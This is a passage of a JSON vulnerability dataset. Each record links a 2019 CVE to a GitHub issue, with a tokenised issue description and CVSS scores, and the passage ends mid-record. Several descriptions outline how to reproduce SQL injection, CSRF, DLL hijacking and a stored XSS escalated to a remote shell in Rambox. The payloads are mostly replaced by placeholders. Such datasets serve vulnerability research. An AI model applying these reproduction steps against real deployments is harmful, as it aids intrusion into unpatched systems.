  40035. "description": "A heap buffer overflow was discovered in APITAG at APITAG NUMBERTAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
  40036. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40037. "severity": "HIGH",
  40038. "baseScore": 7.8,
  40039. "impactScore": 5.9,
  40040. "exploitabilityScore": 1.8
  40041. },
  40042. {
  40043. "CVE_ID": "CVE-2019-17531",
  40044. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2498",
  40045. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2498",
  40046. "Repo_new": "fasterxml/jackson-databind",
  40047. "Issue_Created_At": "2019-10-12T17:42:27Z",
  40048. "description": "Block one more gadget type (apache log4j extras NUMBERTAG CVE to be allocated). Another gadget type reported regarding a class of apache log4j extras package. Mitre id: to be allocated Reporter: \u5f20\u5148\u8f89 Zhangxianhui Fix will be included in NUMBERTAG backported in NUMBERTAG branch too. Not consider vuln for NUMBERTAG or later.",
  40049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40050. "severity": "CRITICAL",
  40051. "baseScore": 9.8,
  40052. "impactScore": 5.9,
  40053. "exploitabilityScore": 3.9
  40054. },
  40055. {
  40056. "CVE_ID": "CVE-2019-17537",
  40057. "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/53",
  40058. "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/53",
  40059. "Repo_new": "shi-yang/jnoj",
  40060. "Issue_Created_At": "2019-10-10T06:43:47Z",
  40061. "description": "NUMBERTAG PATHTAG NUMBERTAG ERRORTAG APITAG FILETAG APITAG NUMBERTAG PATHTAG NUMBERTAG ERRORTAG \u8bf7\u6c42url URLTAG APITAG \u4fee\u590d\u5efa\u8bae:\u5bf9\u4f20\u5165\u7684\u6587\u4ef6\u540d\u79f0\u505a\u6821\u9a8c.",
  40062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40063. "severity": "HIGH",
  40064. "baseScore": 7.5,
  40065. "impactScore": 3.6,
  40066. "exploitabilityScore": 3.9
  40067. },
  40068. {
  40069. "CVE_ID": "CVE-2019-17541",
  40070. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1641",
  40071. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1641",
  40072. "Repo_new": "imagemagick/imagemagick",
  40073. "Issue_Created_At": "2019-07-18T09:43:55Z",
  40074. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG f9e NUMBERTAG aab NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG c3d9a6 in APITAG APITAG NUMBERTAG d1 in APITAG APITAG NUMBERTAG b2 in main APITAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG af NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f9e NUMBERTAG cfac in APITAG APITAG NUMBERTAG 
f9e NUMBERTAG e in APITAG APITAG NUMBERTAG f9e NUMBERTAG b NUMBERTAG c in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG in malloc ( PATHTAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG fb NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f9e NUMBERTAG ff NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG d in APITAG APITAG NUMBERTAG f9e NUMBERTAG b7ec in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ` System Configuration 
APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  40075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40076. "severity": "HIGH",
  40077. "baseScore": 8.8,
  40078. "impactScore": 5.9,
  40079. "exploitabilityScore": 2.8
  40080. },
  40081. {
  40082. "CVE_ID": "CVE-2019-17543",
  40083. "Issue_Url_old": "https://github.com/lz4/lz4/issues/801",
  40084. "Issue_Url_new": "https://github.com/lz4/lz4/issues/801",
  40085. "Repo_new": "lz4/lz4",
  40086. "Issue_Created_At": "2019-10-16T08:43:07Z",
  40087. "description": "Question concerning CVETAG . Hi, I am looking into CVETAG NUMBERTAG specifically I am trying to verify if the issue is present since NUMBERTAG as stated in the comment NUMBERTAG I am testing lz4 version NUMBERTAG and tried to reproduce the issue using an asan build. The command used to reproduce was 'lz NUMBERTAG l APITAG outfile'. Verified that libasan.so was used by lz4 and APITAG verified that the correct liblz4 library is used and that the reproduce is the correct. But still do not see a problem with the old APITAG It would be great if someone could provide some feedback concerning the statement, that the problem is present since NUMBERTAG Please note that I used a patch for lz4 which forces the lz4 binary to use the shared library instead of inlining all the LZ4_ functions. But I think that should not cause any problems NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG CVETAG",
  40088. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40089. "severity": "HIGH",
  40090. "baseScore": 8.1,
  40091. "impactScore": 5.9,
  40092. "exploitabilityScore": 2.2
  40093. },
  40094. {
  40095. "CVE_ID": "CVE-2019-17552",
  40096. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/77",
  40097. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/77",
  40098. "Repo_new": "idreamsoft/iCMS",
  40099. "Issue_Created_At": "2019-09-02T20:36:10Z",
  40100. "description": "There is a SQL injection in FILETAG of iCMS. The cause of the vulnerability is similar to issue NUMBERTAG URLTAG FILETAG But the payload needs a two-dimensional array, which is different from the previous one. CODETAG Step NUMBERTAG save the payload output in a txt file NUMBERTAG import the file as scheme NUMBERTAG see the difference in the return time Pics: sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG",
  40101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40102. "severity": "CRITICAL",
  40103. "baseScore": 9.8,
  40104. "impactScore": 5.9,
  40105. "exploitabilityScore": 3.9
  40106. },
  40107. {
  40108. "CVE_ID": "CVE-2019-17553",
  40109. "Issue_Url_old": "https://github.com/sari3l/cve-test/issues/1",
  40110. "Issue_Url_new": "https://github.com/sari3l/cve-test/issues/1",
  40111. "Repo_new": "sari3l/cve-test",
  40112. "Issue_Created_At": "2019-10-14T10:55:18Z",
  40113. "description": "APITAG beta NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG web can see the web application uses gpc to filter variables in the form. code in APITAG FILETAG but the developers use the get_sql function for secondary filtering, causing escape single quotes. FILETAG payload FILETAG attack with sqlmap ERRORTAG",
  40114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40115. "severity": "CRITICAL",
  40116. "baseScore": 9.8,
  40117. "impactScore": 5.9,
  40118. "exploitabilityScore": 3.9
  40119. },
  40120. {
  40121. "CVE_ID": "CVE-2019-17580",
  40122. "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/1",
  40123. "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/1",
  40124. "Repo_new": "tooonyy/dormsystem",
  40125. "Issue_Created_At": "2019-10-14T12:28:18Z",
  40126. "description": "SQL Injection Vulnerability in FILETAG .",
  40127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40128. "severity": "CRITICAL",
  40129. "baseScore": 9.8,
  40130. "impactScore": 5.9,
  40131. "exploitabilityScore": 3.9
  40132. },
  40133. {
  40134. "CVE_ID": "CVE-2019-17581",
  40135. "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/2",
  40136. "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/2",
  40137. "Repo_new": "tooonyy/dormsystem",
  40138. "Issue_Created_At": "2019-10-14T12:37:15Z",
  40139. "description": "XSS vulnerability in FILETAG / payload= /> APITAG alert NUMBERTAG APITAG .",
  40140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40141. "severity": "MEDIUM",
  40142. "baseScore": 6.1,
  40143. "impactScore": 2.7,
  40144. "exploitabilityScore": 2.8
  40145. },
  40146. {
  40147. "CVE_ID": "CVE-2019-17582",
  40148. "Issue_Url_old": "https://github.com/nih-at/libzip/issues/5",
  40149. "Issue_Url_new": "https://github.com/nih-at/libzip/issues/5",
  40150. "Repo_new": "nih-at/libzip",
  40151. "Issue_Created_At": "2017-08-24T10:44:17Z",
  40152. "description": "use after free in _zip_buffer_free (zip_buffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG I don't know if it is related to the bug fixed here URLTAG",
  40153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40154. "severity": "CRITICAL",
  40155. "baseScore": 9.8,
  40156. "impactScore": 5.9,
  40157. "exploitabilityScore": 3.9
  40158. },
  40159. {
  40160. "CVE_ID": "CVE-2019-17583",
  40161. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/83",
  40162. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/83",
  40163. "Repo_new": "idreamsoft/iCMS",
  40164. "Issue_Created_At": "2019-10-12T08:07:49Z",
  40165. "description": "DOS attack. DOS attack exists in view comment module FILETAG Your review comment feature allows you to query up to NUMBERTAG billion comments. FILETAG Attackers will cause your database to jam or crash through such an attack FILETAG Moreover, the query does not limit CSRF attacks, which can cause database crashes by constructing malicious links",
  40166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40167. "severity": "HIGH",
  40168. "baseScore": 7.5,
  40169. "impactScore": 3.6,
  40170. "exploitabilityScore": 3.9
  40171. },
  40172. {
  40173. "CVE_ID": "CVE-2019-17593",
  40174. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/1",
  40175. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/1",
  40176. "Repo_new": "Cherry-toto/jizhicms",
  40177. "Issue_Created_At": "2019-09-25T04:41:38Z",
  40178. "description": "\u6dfb\u52a0\u7ba1\u7406\u5458\u5904\u5b58\u5728csrf\u6f0f\u6d1e. \u60a8\u597d\uff0c APITAG site request forgery\uff0c\u7b80\u79f0CSRF\uff09\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG > poc\u5982\u4e0b\uff1a CODETAG \u6709\u95ee\u9898\u7684\u8bdd\u60a8\u53ef\u4ee5\u7ee7\u7eed\u548c\u6211\u8054\u7cfb",
  40179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40180. "severity": "HIGH",
  40181. "baseScore": 8.8,
  40182. "impactScore": 5.9,
  40183. "exploitabilityScore": 2.8
  40184. },
  40185. {
  40186. "CVE_ID": "CVE-2019-17596",
  40187. "Issue_Url_old": "https://github.com/golang/go/issues/34960",
  40188. "Issue_Url_new": "https://github.com/golang/go/issues/34960",
  40189. "Repo_new": "golang/go",
  40190. "Issue_Created_At": "2019-10-17T18:43:01Z",
  40191. "description": "crypto/dsa: invalid public key causes panic in APITAG Invalid DSA public keys can cause a panic in APITAG In particular, using APITAG on a crafted NUMBERTAG certificate chain can lead to a panic, even if the certificates don\u2019t chain to a trusted root. The chain can be delivered via a crypto/tls connection to a client, or to a server that accepts and verifies client certificates. net/http clients can be made to crash by an HTTPS server, while net/http servers that accept client certificates will recover the panic and are unaffected. Moreover, an application might crash invoking crypto NUMBERTAG APITAG APITAG on an NUMBERTAG certificate request, parsing a PATHTAG Entity, or during a PATHTAG conversation. Finally, a PATHTAG client can panic due to a malformed host key, while a server could panic if either APITAG accepts a malformed public key, or if APITAG accepts a certificate with a malformed public key. The issue is CVETAG .",
  40192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40193. "severity": "HIGH",
  40194. "baseScore": 7.5,
  40195. "impactScore": 3.6,
  40196. "exploitabilityScore": 3.9
  40197. },
  40198. {
  40199. "CVE_ID": "CVE-2019-17599",
  40200. "Issue_Url_old": "https://github.com/QuizandSurveyMaster/quiz_master_next/issues/795",
  40201. "Issue_Url_new": "https://github.com/quizandsurveymaster/quiz_master_next/issues/795",
  40202. "Repo_new": "quizandsurveymaster/quiz_master_next",
  40203. "Issue_Created_At": "2019-11-13T07:45:25Z",
  40204. "description": "report reflected xss vulnerability. IF YOU DO NOT FOLLOW THIS TEMPLATE, YOUR ISSUE MAY BE CLOSED!! Please provide the following information when creating your issues: Site Info APITAG Version: Latest QSM Version NUMBERTAG and NUMBERTAG Browser: chrome NUMBERTAG General description Quiz And Survey Master \u2013 Best Quiz Plugin for APITAG for APITAG is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and APITAG code via the from or till parameter. The component is: PATHTAG The attack vector is: When the Administrator is logged in, a reflected XSS may execute upon a click on a malicious URL. \u200b special conditions must be met in order to exploit this vulnerability: The wordpress security feature APITAG which is enabled by default, has to be disabled. \u200b Vulnerable code : PATHTAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Link to quiz or screenshot (if relevant): Expected behavior nothing. Actual behavior reflected XSS, victim may click the malicious url. APITAG must be logged in.) Steps to reproduce the behavior URLTAG",
  40205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40206. "severity": "MEDIUM",
  40207. "baseScore": 6.1,
  40208. "impactScore": 2.7,
  40209. "exploitabilityScore": 2.8
  40210. },
  40211. {
  40212. "CVE_ID": "CVE-2019-17625",
  40213. "Issue_Url_old": "https://github.com/ramboxapp/community-edition/issues/2418",
  40214. "Issue_Url_new": "https://github.com/ramboxapp/community-edition/issues/2418",
  40215. "Repo_new": "ramboxapp/community-edition",
  40216. "Issue_Created_At": "2019-10-16T02:51:46Z",
  40217. "description": "Stored XSS vulnerability in Rambo NUMBERTAG Issue Hey! How you doing this PATHTAG I'm doing pretty good, thanks for asking, unfortunately I have some bad news for you ... There is a stored XSS in Rambox version NUMBERTAG that is capable of leading to RCE. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a specific payload that will produce up to (but not limited to) RCE. How (come I even tried this ;p)? The vulnerability occurs, as mentioned above, in the name field due to unsanitized input. An end user is able to input anything they want into the field which will be displayed. Due to this APITAG tags and APITAG tags are also allowed. For example if we take the payload ERRORTAG and add it as the name of one of our services we will be met with the following: FILETAG As you can clearly see the tag is processed and executed within the application. If we restart Rambox, we will be met with the same message. (I was really bored at work, and since we use this I was like why the heck not right? Turns out now I have a really big vulnerability to deal with tomorrow ... YAY ME!) Impact Seeing as this repository has NUMBERTAG k stars, I'd assume the impact to be pretty significant. I'm planning on writing some exploit code for it, and will happily share that with you and the rest of the world once it's done. But you said RCE? Oh heck yes I did! Let's get RCE from a stored XSS vulnerability really quick! So as determined above, we can use anything for the name field. So what about a shell? Can we do that? I mean I don't see why not so lets find out ... Payload: ERRORTAG Since the application uses node (as stated in the about section and because it's electron) we can safely assume that we can also use node. Now all we have to do is restart the box and setup a listener. 
Lets try it out: FILETAG And that my friends, is how you get RCE from XSS. I'll be here all week.",
  40218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  40219. "severity": "CRITICAL",
  40220. "baseScore": 9.0,
  40221. "impactScore": 6.0,
  40222. "exploitabilityScore": 2.3
  40223. },
  40224. {
  40225. "CVE_ID": "CVE-2019-17662",
  40226. "Issue_Url_old": "https://github.com/bewest/thinvnc/issues/5",
  40227. "Issue_Url_new": "https://github.com/bewest/thinvnc/issues/5",
  40228. "Repo_new": "bewest/thinvnc",
  40229. "Issue_Created_At": "2019-10-16T08:15:49Z",
  40230. "description": "Authentication Bypass and Arbitrary file read can compromise this VNC server. An authenticated attacker can compromise the VNC server even if it is password protected. There's a bug in the web client which is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and gives an attacker terminal access to the remote system.",
  40231. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40232. "severity": "CRITICAL",
  40233. "baseScore": 9.8,
  40234. "impactScore": 5.9,
  40235. "exploitabilityScore": 3.9
  40236. },
  40237. {
  40238. "CVE_ID": "CVE-2019-17664",
  40239. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/107",
  40240. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/107",
  40241. "Repo_new": "nationalsecurityagency/ghidra",
  40242. "Issue_Created_At": "2019-03-07T23:07:52Z",
  40243. "description": "Uncontrolled Search Path Element when executing CMD.. Describe the bug When executing Ghidra from a given path the Java process working directory is set to this path. Then, when launching the Python interpreter located in APITAG Codebrowser\" > APITAG > APITAG Ghidra will try to execute an arbitrary file APITAG located at the attacker chosen working directory. To Reproduce Steps to reproduce the behavior NUMBERTAG Copy an arbitrary Portable Executable file named APITAG into a folder, for instance: PATHTAG NUMBERTAG Open a command line and go to the chosen folder. Following the same example: cd PATHTAG NUMBERTAG Execute Ghidra from the command line: FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG ersion NUMBERTAG",
  40244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40245. "severity": "HIGH",
  40246. "baseScore": 7.8,
  40247. "impactScore": 5.9,
  40248. "exploitabilityScore": 1.8
  40249. },
  40250. {
  40251. "CVE_ID": "CVE-2019-17665",
  40252. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/286",
  40253. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/286",
  40254. "Repo_new": "nationalsecurityagency/ghidra",
  40255. "Issue_Created_At": "2019-03-28T21:41:39Z",
  40256. "description": "DLL Hijacking \"\". Describe the bug Ghidra NUMBERTAG is vulnerable to DLL hijacking because it loads, at least, APITAG from the working directory instead of loading it from the right directory where it is expected to be. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile the following code and name the resulting binary file as APITAG CODETAG NUMBERTAG Execute Ghidra from the working directory where the resulting APITAG exists NUMBERTAG APITAG file will get executed. Expected behavior Load APITAG from the right directory where it is expected to be. Screenshots FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG APITAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context In practice, the vulnerability can be exploited, for instance, if the user launches Ghidra Projects from the contextual menu and it comes with a malicious APITAG file. CODETAG",
  40257. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40258. "severity": "HIGH",
  40259. "baseScore": 7.8,
  40260. "impactScore": 5.9,
  40261. "exploitabilityScore": 1.8
  40262. },
  40263. {
  40264. "CVE_ID": "CVE-2019-17676",
  40265. "Issue_Url_old": "https://github.com/anx1ang/notes/issues/1",
  40266. "Issue_Url_new": "https://github.com/newkin1996/notes/issues/1",
  40267. "Repo_new": "newkin1996/notes",
  40268. "Issue_Created_At": "2019-10-09T06:58:49Z",
  40269. "description": "APITAG NUMBERTAG beta allows a CSRF attack to add a user account via a APITAG action to FILETAG , as demonstrated by an APITAG URI.. code: at PATHTAG source code: ERRORTAG Global search code about csrf. APITAG No code found to defend against CSRF attacks. exp: After the administrator logged in, open the following page ERRORTAG",
  40270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40271. "severity": "HIGH",
  40272. "baseScore": 8.8,
  40273. "impactScore": 5.9,
  40274. "exploitabilityScore": 2.8
  40275. },
  40276. {
  40277. "CVE_ID": "CVE-2019-18214",
  40278. "Issue_Url_old": "https://github.com/PaulLereverend/NextcloudVideo_Converter/issues/22",
  40279. "Issue_Url_new": "https://github.com/paullereverend/nextcloudvideo_converter/issues/22",
  40280. "Repo_new": "paullereverend/nextcloudvideo_converter",
  40281. "Issue_Created_At": "2019-10-18T11:40:12Z",
  40282. "description": "Add queue support Security Issue]. Hi, I think that having a queue for multiple conversions. If a server is doing multiple conversions, even if it all of them are with low priority, it hangs. I suggest to have a queue, allowing only one (or multiple, settings could be changed) process at the same time. The queue can be changed using the priorities, so when a high priority process is added to the queue, it should be at the top of the queue. The users should be able to see the queue status. Not other users queue, but the position on the list. For example if the queue is NUMBERTAG user1 > video1 > processing NUMBERTAG user1 > video NUMBERTAG user2 > video NUMBERTAG user3 > video NUMBERTAG user1 > video5 The user1, can see the queue as NUMBERTAG user1 > video1 > position NUMBERTAG processing NUMBERTAG user1 > video2 > position NUMBERTAG user1 > video5 > position NUMBERTAG The user2, only can see the queue as NUMBERTAG user2 > video3 > position NUMBERTAG The users should also be able to cancel the queued jobs and, potentially cancel the current process. NOTE: It is a security issue as the users can generate a APITAG because of several concurrent processes. CVSS NUMBERTAG PATHTAG URLTAG CVSS NUMBERTAG FILETAG",
  40283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
  40284. "severity": "HIGH",
  40285. "baseScore": 7.7,
  40286. "impactScore": 4.0,
  40287. "exploitabilityScore": 3.1
  40288. },
  40289. {
  40290. "CVE_ID": "CVE-2019-18217",
  40291. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/846",
  40292. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/846",
  40293. "Repo_new": "proftpd/proftpd",
  40294. "Issue_Created_At": "2019-10-19T19:34:47Z",
  40295. "description": "Remote denial of service due to issue in network IO handling. Dear MENTIONTAG \u2014 As discussed, please find below the description of the APITAG NUMBERTAG denial of service issue. Issue Remote unauthenticated denial of service in APITAG NUMBERTAG triggered by a malformed network packet due to an incorrect handling of too long commands. Version APITAG NUMBERTAG PATHTAG Description An unauthenticated attacker can trigger an infinite loop by sending a malformed network packet due to an incorrect handling of too long commands. The issue in the network IO causes a child process that handles the client connection to consume NUMBERTAG CPU. If errno is NUMBERTAG E2BIG) due to a too long command and the EOF is reached, APITAG function will always return NUMBERTAG and will be called indefinitely due to the continue statement: CODETAG Impact Remote unauthenticated denial of service Cheers Stephan Zeisberg",
  40296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40297. "severity": "HIGH",
  40298. "baseScore": 7.5,
  40299. "impactScore": 3.6,
  40300. "exploitabilityScore": 3.9
  40301. },
  40302. {
  40303. "CVE_ID": "CVE-2019-18409",
  40304. "Issue_Url_old": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
  40305. "Issue_Url_new": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
  40306. "Repo_new": "zenspider/ruby_parser-legacy",
  40307. "Issue_Created_At": "2019-10-24T12:37:36Z",
  40308. "description": "Security Issue : invalid permission on ruby files. Hi, This gem has world writable files in the release NUMBERTAG how to reproduce the issue CODETAG exploitation poc add in PATHTAG APITAG require the gem in another project may run the shell code with the user privilege. CODETAG Please release a new release asap.",
  40309. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  40310. "severity": "HIGH",
  40311. "baseScore": 7.8,
  40312. "impactScore": 5.9,
  40313. "exploitabilityScore": 1.8
  40314. },
  40315. {
  40316. "CVE_ID": "CVE-2019-18413",
  40317. "Issue_Url_old": "https://github.com/typestack/class-validator/issues/438",
  40318. "Issue_Url_new": "https://github.com/typestack/class-validator/issues/438",
  40319. "Repo_new": "typestack/class-validator",
  40320. "Issue_Created_At": "2019-10-19T19:11:50Z",
  40321. "description": "class validator arbitrary bypass. With this vulnerability, an attacker can bypass any security checks enforced by class validator. When class validator is used to validate user input, the attributes in the user input object will be transformed into the validation class instance. However, the transforming procedure will overwrite the internal attribute of validation class instance (e.g., constructor attribute) if the attacker injects an attribute with the same name into user input. Once this internal attribute being overwritten, class validator will be bypassed. APITAG ERRORTAG Our suggestion is that class validator should check the integrity of the constructor: if it is being corrupted, the validation should automatically fail.",
  40322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40323. "severity": "CRITICAL",
  40324. "baseScore": 9.8,
  40325. "impactScore": 5.9,
  40326. "exploitabilityScore": 3.9
  40327. },
  40328. {
  40329. "CVE_ID": "CVE-2019-18413",
  40330. "Issue_Url_old": "https://github.com/typestack/class-validator/issues/1422",
  40331. "Issue_Url_new": "https://github.com/typestack/class-validator/issues/1422",
  40332. "Repo_new": "typestack/class-validator",
  40333. "Issue_Created_At": "2021-11-25T03:20:15Z",
